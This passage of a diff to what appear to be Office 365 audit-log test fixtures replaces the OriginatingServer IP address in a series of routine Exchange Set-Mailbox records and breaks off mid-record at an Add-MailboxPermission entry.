bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5648,7 +5648,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5722,7 +5722,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5734,7 +5734,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5808,7 +5808,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5820,7 +5820,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5894,7 +5894,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5906,7 +5906,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5980,7 +5980,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5992,7 +5992,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6066,7 +6066,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6078,7 +6078,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -6152,7 +6152,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 